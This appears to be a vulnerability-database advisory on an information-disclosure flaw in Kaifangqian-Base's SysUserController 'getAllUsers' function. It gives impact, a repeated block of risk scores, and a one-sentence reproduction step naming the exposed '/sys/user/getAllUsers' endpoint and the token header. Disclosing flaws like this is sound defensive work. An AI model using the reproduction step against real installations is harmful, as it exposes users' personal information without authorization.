Primary

Context

Kaifangqian Kaifangqian-Base Information Disclosure Vulnerability in SysUserController

Vulnerability

A vulnerability allowing information disclosure has been identified in Kaifangqian Kaifangqian-Base versions prior to 7b3faecda13848b3ced6c17c7423b76c5b47b8ab. The issue arises in the 'getAllUsers' function of the SysUserController.java file. This vulnerability can be exploited remotely, allowing unauthorized access to sensitive user information.

Impact

Exploitation of this vulnerability leads to unauthorized access to sensitive user information, causing a breach of confidentiality.

Reproduction

To reproduce this vulnerability, send a GET request to the '/sys/user/getAllUsers' endpoint. Include a valid access token in the 'X-Access-Token' header. The response will contain user information from the database, which should not be accessible without proper authorization.

Added: Oct 7, 2025, 8:27 PM

Updated: Oct 7, 2025, 8:27 PM

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

2.5

exploitability

6.6

remediation

0.0

relevance

0.7

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

2.5

exploitability

6.6

remediation

0.0

relevance

0.7

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Kaifangqian Kaifangqian-Base Information Disclosure Vulnerability in SysUserController

Vulnerability

Impact

Reproduction

Affected Products

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating